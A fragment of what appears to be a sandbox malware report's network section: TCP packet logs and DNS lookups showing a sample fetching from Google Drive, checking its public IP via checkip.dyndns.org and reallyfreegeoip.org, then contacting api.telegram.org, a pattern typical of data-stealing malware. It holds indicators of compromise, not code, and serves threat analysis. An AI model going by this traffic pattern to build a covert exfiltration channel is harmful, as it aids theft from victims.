Feb 25, 2025 08:27:39.613558054 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.613636017 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.615710020 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.615763903 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.615770102 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.615813017 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.618055105 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.618103981 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.618119955 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.618256092 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.620326042 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.620378971 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.620383978 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.620436907 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.622580051 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.622617006 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.622699022 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.622739077 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.624864101 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.624907017 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.625533104 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.625583887 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.627149105 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.627248049 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.627255917 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.627330065 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.629393101 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.629436970 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.630526066 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.630592108 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.631823063 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.631884098 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.631891966 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.631937981 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.634013891 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.634114981 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.635240078 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.635320902 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.636322021 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.636370897 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.636390924 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.636486053 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.638573885 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.638628006 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.639744997 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.639810085 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.640856981 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.640938997 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.640948057 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.640985012 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.643034935 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.643162012 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.643943071 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.643987894 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.645243883 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.645302057 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.645323992 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.645375967 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.647291899 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.647336006 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.648010015 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.648067951 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.649584055 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.649676085 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.649694920 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.649738073 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.649796009 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.649835110 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.651642084 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.651765108 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.652245045 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.652316093 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.653719902 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.653799057 CET  49781  443  192.168.2.4  142.250.185.193
Feb 25, 2025 08:27:39.653815985 CET  443  49781  142.250.185.193  192.168.2.4
Feb 25, 2025 08:27:39.653889894 CET  49781  443  192.168.2.4  142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.656944990 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.657016039 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.657027006 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.657074928 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.658025980 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.658122063 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.658128977 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.658193111 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.660856009 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.660902023 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.660934925 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.660974979 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.664694071 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.664735079 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.664768934 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.664830923 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.665507078 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.665596008 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.665604115 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.665652990 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.667404890 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.667447090 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.667484999 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.667529106 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.669018984 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.669059038 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.669092894 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.669187069 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.670743942 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.670793056 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.670821905 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.671003103 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.672410965 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.672472954 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.672544956 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.672694921 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.674177885 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.674256086 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.674264908 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.674333096 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.676204920 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.676388025 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.676403046 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.676440001 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.677397966 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.677453041 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.677458048 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.677512884 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.678888083 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.678949118 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.679023981 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.679059029 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.680507898 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.680566072 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.680582047 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.680622101 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.681966066 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.682017088 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.682115078 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.682163954 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.683561087 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.683612108 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.683640957 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.683691978 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.685125113 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.685192108 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.685204983 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.685292006 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.686487913 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.686541080 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.686625004 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.686670065 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.687994003 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.688158035 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.688174009 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.688215017 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.689343929 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.689418077 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.689430952 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.689482927 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.690689087 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.690762043 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.690788984 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.690844059 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.690860987 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.690927029 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.692152977 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.692200899 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.692236900 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.692284107 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.693437099 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.693496943 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.693592072 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.693634987 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.694802046 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.694864035 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.694936991 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.695049047 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.696068048 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.696115971 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.696192980 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.696285963 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.697571993 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.697695017 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.697705030 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.697747946 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.698709965 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.698765993 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.698791981 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.698832989 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.700215101 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.700258017 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.700361967 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.700413942 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.700453043 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.700500011 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.700536966 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.700579882 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:39.700591087 CET44349781142.250.185.193192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:39.700639009 CET49781443192.168.2.4142.250.185.193
                                                                                                                                                                  Feb 25, 2025 08:27:40.372189045 CET4981280192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:50.715636015 CET44349887104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:50.715714931 CET49887443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:50.716027975 CET49887443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:50.716047049 CET44349887104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:50.768923998 CET4988180192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:51.178220034 CET44349887104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:51.179893017 CET49887443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:51.179932117 CET44349887104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:51.324511051 CET44349887104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:51.324584961 CET44349887104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:51.324688911 CET49887443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:51.325311899 CET49887443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:51.367939949 CET4988180192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:51.369010925 CET4989380192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:51.373182058 CET8049881158.101.44.242192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:51.374068022 CET8049893158.101.44.242192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:51.374119997 CET4988180192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:51.374160051 CET4989380192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:51.374267101 CET4989380192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:51.379240990 CET8049893158.101.44.242192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:51.957364082 CET8049893158.101.44.242192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:51.958853006 CET49899443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:51.958887100 CET44349899104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:51.958981991 CET49899443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:51.959286928 CET49899443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:51.959296942 CET44349899104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:52.003212929 CET4989380192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:52.413939953 CET44349899104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:52.415852070 CET49899443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:52.415894032 CET44349899104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:52.556088924 CET44349899104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:52.556150913 CET44349899104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:52.556202888 CET49899443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:52.556617022 CET49899443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:52.747050047 CET4989380192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:52.752444029 CET8049893158.101.44.242192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:52.752507925 CET4989380192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:52.756226063 CET49905443192.168.2.4149.154.167.220
                                                                                                                                                                  Feb 25, 2025 08:27:52.756268024 CET44349905149.154.167.220192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:52.756340027 CET49905443192.168.2.4149.154.167.220
                                                                                                                                                                  Feb 25, 2025 08:27:52.756782055 CET49905443192.168.2.4149.154.167.220
                                                                                                                                                                  Feb 25, 2025 08:27:52.756794930 CET44349905149.154.167.220192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:53.377994061 CET44349905149.154.167.220192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:53.378204107 CET49905443192.168.2.4149.154.167.220
                                                                                                                                                                  Feb 25, 2025 08:27:53.380194902 CET49905443192.168.2.4149.154.167.220
                                                                                                                                                                  Feb 25, 2025 08:27:53.380222082 CET44349905149.154.167.220192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:53.380494118 CET44349905149.154.167.220192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:53.385106087 CET49905443192.168.2.4149.154.167.220
                                                                                                                                                                  Feb 25, 2025 08:27:53.427331924 CET44349905149.154.167.220192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:53.628149986 CET44349905149.154.167.220192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:53.628222942 CET44349905149.154.167.220192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:53.628382921 CET49905443192.168.2.4149.154.167.220
                                                                                                                                                                  Feb 25, 2025 08:27:53.631210089 CET49905443192.168.2.4149.154.167.220
                                                                                                                                                                  Feb 25, 2025 08:27:59.796832085 CET4983080192.168.2.4158.101.44.242
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 25, 2025 08:27:34.686697960 CET | 52480 | 53 | 192.168.2.4 | 1.1.1.1
Feb 25, 2025 08:27:34.693865061 CET | 53 | 52480 | 1.1.1.1 | 192.168.2.4
Feb 25, 2025 08:27:35.923798084 CET | 57736 | 53 | 192.168.2.4 | 1.1.1.1
Feb 25, 2025 08:27:35.931056023 CET | 53 | 57736 | 1.1.1.1 | 192.168.2.4
Feb 25, 2025 08:27:40.351269007 CET | 63088 | 53 | 192.168.2.4 | 1.1.1.1
Feb 25, 2025 08:27:40.358627081 CET | 53 | 63088 | 1.1.1.1 | 192.168.2.4
Feb 25, 2025 08:27:41.670273066 CET | 61048 | 53 | 192.168.2.4 | 1.1.1.1
Feb 25, 2025 08:27:41.689589977 CET | 53 | 61048 | 1.1.1.1 | 192.168.2.4
Feb 25, 2025 08:27:52.747853994 CET | 55731 | 53 | 192.168.2.4 | 1.1.1.1
Feb 25, 2025 08:27:52.755647898 CET | 53 | 55731 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 25, 2025 08:27:34.686697960 CET | 192.168.2.4 | 1.1.1.1 | 0xcbb | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Feb 25, 2025 08:27:35.923798084 CET | 192.168.2.4 | 1.1.1.1 | 0x3027 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Feb 25, 2025 08:27:40.351269007 CET | 192.168.2.4 | 1.1.1.1 | 0x88d9 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Feb 25, 2025 08:27:41.670273066 CET | 192.168.2.4 | 1.1.1.1 | 0x2e5a | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Feb 25, 2025 08:27:52.747853994 CET | 192.168.2.4 | 1.1.1.1 | 0x4e23 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 25, 2025 08:27:34.693865061 CET | 1.1.1.1 | 192.168.2.4 | 0xcbb | No error (0) | drive.google.com | | 172.217.18.14 | A (IP address) | IN (0x0001) | false
Feb 25, 2025 08:27:35.931056023 CET | 1.1.1.1 | 192.168.2.4 | 0x3027 | No error (0) | drive.usercontent.google.com | | 142.250.185.193 | A (IP address) | IN (0x0001) | false
Feb 25, 2025 08:27:40.358627081 CET | 1.1.1.1 | 192.168.2.4 | 0x88d9 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Feb 25, 2025 08:27:40.358627081 CET | 1.1.1.1 | 192.168.2.4 | 0x88d9 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Feb 25, 2025 08:27:40.358627081 CET | 1.1.1.1 | 192.168.2.4 | 0x88d9 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Feb 25, 2025 08:27:40.358627081 CET | 1.1.1.1 | 192.168.2.4 | 0x88d9 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Feb 25, 2025 08:27:40.358627081 CET | 1.1.1.1 | 192.168.2.4 | 0x88d9 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Feb 25, 2025 08:27:40.358627081 CET | 1.1.1.1 | 192.168.2.4 | 0x88d9 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Feb 25, 2025 08:27:41.689589977 CET | 1.1.1.1 | 192.168.2.4 | 0x2e5a | No error (0) | reallyfreegeoip.org | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Feb 25, 2025 08:27:41.689589977 CET | 1.1.1.1 | 192.168.2.4 | 0x2e5a | No error (0) | reallyfreegeoip.org | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Feb 25, 2025 08:27:41.689589977 CET | 1.1.1.1 | 192.168.2.4 | 0x2e5a | No error (0) | reallyfreegeoip.org | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Feb 25, 2025 08:27:41.689589977 CET | 1.1.1.1 | 192.168.2.4 | 0x2e5a | No error (0) | reallyfreegeoip.org | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Feb 25, 2025 08:27:41.689589977 CET | 1.1.1.1 | 192.168.2.4 | 0x2e5a | No error (0) | reallyfreegeoip.org | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Feb 25, 2025 08:27:41.689589977 CET | 1.1.1.1 | 192.168.2.4 | 0x2e5a | No error (0) | reallyfreegeoip.org | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Feb 25, 2025 08:27:41.689589977 CET | 1.1.1.1 | 192.168.2.4 | 0x2e5a | No error (0) | reallyfreegeoip.org | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Feb 25, 2025 08:27:52.755647898 CET | 1.1.1.1 | 192.168.2.4 | 0x4e23 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• drive.google.com
• drive.usercontent.google.com
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
